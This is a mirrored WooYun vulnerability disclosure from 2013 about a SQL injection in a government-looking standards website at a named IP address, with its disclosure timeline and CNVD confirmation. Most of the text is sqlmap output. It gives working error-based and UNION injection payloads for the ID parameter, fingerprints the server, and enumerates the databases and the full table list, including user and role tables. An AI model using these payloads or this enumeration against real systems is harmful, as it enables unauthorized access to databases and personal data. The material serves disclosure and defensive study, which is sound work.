乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-07-13: 细节已通知厂商并且等待厂商处理中 2013-07-17: 厂商已经确认,细节仅向厂商公开 2013-07-27: 细节向核心白帽子及相关领域专家公开 2013-08-06: 细节向普通白帽子公开 2013-08-16: 细节向实习白帽子公开 2013-08-27: 细节向公众公开
http://219.141.187.20/display.aspx?ID=10&Type=statute
---Place: GETParameter: ID Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ID=10 AND 2859=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(106)+CHAR(122)+CHAR(58)+(SELECT (CASE WHEN (2859=2859) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(108)+CHAR(58)))&Type=statute Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: ID=10 UNION ALL SELECT CHAR(58)+CHAR(107)+CHAR(106)+CHAR(122)+CHAR(58)+CHAR(114)+CHAR(87)+CHAR(98)+CHAR(78)+CHAR(70)+CHAR(102)+CHAR(84)+CHAR(117)+CHAR(73)+CHAR(107)+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(108)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &Type=statute---[03:55:03] [INFO] testing Microsoft SQL Server[03:55:06] [INFO] confirming Microsoft SQL Server[03:55:06] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008[03:55:06] [INFO] fetching database names[03:55:09] [INFO] the SQL query used returns 7 entries[03:55:09] [INFO] retrieved: "CY_Standards"[03:55:12] [INFO] retrieved: "master"[03:55:13] [INFO] retrieved: "model"[03:55:13] [INFO] retrieved: "msdb"[03:55:13] [INFO] retrieved: "ReportServer"[03:55:17] [INFO] retrieved: "ReportServerTempDB"[03:55:20] [INFO] retrieved: "tempdb"available databases [7]: [*] CY_Standards[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
Database: CY_Standards [126 tables]+-------------------------------------------------------+| dbo.D99_CMD || dbo.D99_Tmp || dbo.DIY_TEMPCOMMAND_TABLE || dbo.Documents || dbo.DocumentsInfo || dbo.Info_FAQ || dbo.Roles || dbo.TCInfo || dbo.VIEW1 || dbo.ZTB_DeptInfo || dbo.ZTB_UserInfo || dbo.[_06dcc84f-118d-4208-a4ea-7fcf5b371436] || dbo.[_06dcc84f-118d-4208-a4ea-7fcf5b371436_DynamicPA] || dbo.[_06dcc84f-118d-4208-a4ea-7fcf5b371436_Version] || dbo.[_0a180f98-9af3-44ce-96c5-181295ad78c6] || dbo.[_0a180f98-9af3-44ce-96c5-181295ad78c6_DynamicPA] || dbo.[_0a180f98-9af3-44ce-96c5-181295ad78c6_Version] || dbo.[_0a71cd2f-0915-4bd2-838f-f4ff074efd07] || dbo.[_0a71cd2f-0915-4bd2-838f-f4ff074efd07_DynamicPA] || dbo.[_0a71cd2f-0915-4bd2-838f-f4ff074efd07_Version] || dbo.[_158e680d-ed47-4e50-9540-58b5c1393ddd] || dbo.[_158e680d-ed47-4e50-9540-58b5c1393ddd_DynamicPA] || dbo.[_158e680d-ed47-4e50-9540-58b5c1393ddd_Version] || dbo.[_17aaaecc-e87d-4f0f-ac35-959b9660046a] || dbo.[_17aaaecc-e87d-4f0f-ac35-959b9660046a_DynamicPA] || dbo.[_17aaaecc-e87d-4f0f-ac35-959b9660046a_Version] || dbo.[_26df551d-a02e-467d-a759-f893b8f014b4] || dbo.[_26df551d-a02e-467d-a759-f893b8f014b4_DynamicPA] || dbo.[_26df551d-a02e-467d-a759-f893b8f014b4_Version] || dbo.[_31bc42b5-9eab-4b3b-99f7-2397abb976fd] || dbo.[_31bc42b5-9eab-4b3b-99f7-2397abb976fd_DynamicPA] || dbo.[_31bc42b5-9eab-4b3b-99f7-2397abb976fd_Version] || dbo.[_5056662a-5513-4929-9c8c-43cdfad51c4d] || dbo.[_5056662a-5513-4929-9c8c-43cdfad51c4d_DynamicPA] || dbo.[_5056662a-5513-4929-9c8c-43cdfad51c4d_Version] || dbo.[_7b07eade-a1e7-4d2f-a3eb-20277e4115ce] || dbo.[_7b07eade-a1e7-4d2f-a3eb-20277e4115ce_DynamicPA] || dbo.[_7b07eade-a1e7-4d2f-a3eb-20277e4115ce_Version] || dbo.[_a6a7a594-ce4b-4af6-84a4-eb72a2a58c8b] || dbo.[_a6a7a594-ce4b-4af6-84a4-eb72a2a58c8b_DynamicPA] || dbo.[_a6a7a594-ce4b-4af6-84a4-eb72a2a58c8b_Version] || dbo.[_a7ee9495-4033-438c-902d-39dd5ede61f4] || dbo.[_a7ee9495-4033-438c-902d-39dd5ede61f4_DynamicPA] || dbo.[_a7ee9495-4033-438c-902d-39dd5ede61f4_Version] || dbo.[_adb723ef-3198-41c4-bdff-bf92b864258b] || dbo.[_adb723ef-3198-41c4-bdff-bf92b864258b_DynamicPA] || dbo.[_adb723ef-3198-41c4-bdff-bf92b864258b_Version] || dbo.[_aeffd70c-d3be-439a-8892-3242d258fde7] || dbo.[_aeffd70c-d3be-439a-8892-3242d258fde7_DynamicPA] || dbo.[_aeffd70c-d3be-439a-8892-3242d258fde7_Version] || dbo.[_bfafc861-d0fb-4bdd-b51a-a8df55d0a867] || dbo.[_bfafc861-d0fb-4bdd-b51a-a8df55d0a867_DynamicPA] || dbo.[_bfafc861-d0fb-4bdd-b51a-a8df55d0a867_Version] || dbo.[_c276f37f-111a-4971-b496-bdc1d832933d] || dbo.[_c276f37f-111a-4971-b496-bdc1d832933d_DynamicPA] || dbo.[_c276f37f-111a-4971-b496-bdc1d832933d_Version] || dbo.[_c3ec8cd0-d75e-4aee-8316-0655c4a559a3] || dbo.[_c3ec8cd0-d75e-4aee-8316-0655c4a559a3_DynamicPA] || dbo.[_c3ec8cd0-d75e-4aee-8316-0655c4a559a3_Version] || dbo.[_cb50d9ff-93d8-4428-8978-8545e2ee0db5] || dbo.[_cb50d9ff-93d8-4428-8978-8545e2ee0db5_DynamicPA] || dbo.[_cb50d9ff-93d8-4428-8978-8545e2ee0db5_Version] || dbo.[_df06b21c-8faa-4fc3-8daf-5ab18989f216] || dbo.[_df06b21c-8faa-4fc3-8daf-5ab18989f216_DynamicPA] || dbo.[_df06b21c-8faa-4fc3-8daf-5ab18989f216_Version] || dbo.[_e9216f66-0fa8-45b7-bde2-a3de08e3b05c] || dbo.[_e9216f66-0fa8-45b7-bde2-a3de08e3b05c_DynamicPA] || dbo.[_e9216f66-0fa8-45b7-bde2-a3de08e3b05c_Version] || dbo.[_ea5b7a09-0a16-40f7-9d70-ed0a1db517af] || dbo.[_ea5b7a09-0a16-40f7-9d70-ed0a1db517af_DynamicPA] || dbo.[_ea5b7a09-0a16-40f7-9d70-ed0a1db517af_Version] || dbo.[_eb5562e5-3b88-4d02-b9ab-1d0c3e8ccee8] || dbo.[_eb5562e5-3b88-4d02-b9ab-1d0c3e8ccee8_DynamicPA] || dbo.[_eb5562e5-3b88-4d02-b9ab-1d0c3e8ccee8_Version] || dbo.[_f37442a4-57af-4352-b3fd-2a4722b82aad] || dbo.[_f37442a4-57af-4352-b3fd-2a4722b82aad_DynamicPA] || dbo.[_f37442a4-57af-4352-b3fd-2a4722b82aad_Version] || dbo._ || dbo.__Config || dbo.deptInfo || dbo.docType || dbo.downloadRecords || dbo.downloadStandard || dbo.dtproperties || dbo.dynamicAmend || dbo.dynamicAmendIfo || dbo.dynamicAmendInfoA || dbo.dynamicAmendInfoB || dbo.dynamicAmendUserInfo || dbo.dynamicCode || dbo.dynamicCodeIfo || dbo.dynamicFields || dbo.education || dbo.elements || dbo.infoRelease || dbo.infoType || dbo.info_amend || dbo.info_bulletin || dbo.info_chair || dbo.info_feedback || dbo.info_feedbackDetails || dbo.info_knowledge || dbo.info_notice || dbo.info_statute || dbo.mailList || dbo.phases || dbo.plans || dbo.plansAttach || dbo.rights || dbo.roleRights || dbo.standardWatch || dbo.standards || dbo.standardsClass || dbo.standardsClass_Ext || dbo.standardsFlow || dbo.standardsOpnion || dbo.standardsOpnionInfo || dbo.standardsPNum_bak || dbo.standardsProc || dbo.sysLogs || dbo.userInfo || dbo.userRolesRelation || dbo.vStandards || dbo.vStandardsTemp1 || dbo.vStandardsTemp2 || dbo.vStandardsTemp3 |+-------------------------------------------------------+
危害等级:高
漏洞Rank:15
确认时间:2013-07-17 23:23
CNVD确认并复现所述情况,拟通过正式函件方式通报网站管理单位。rank 15
暂无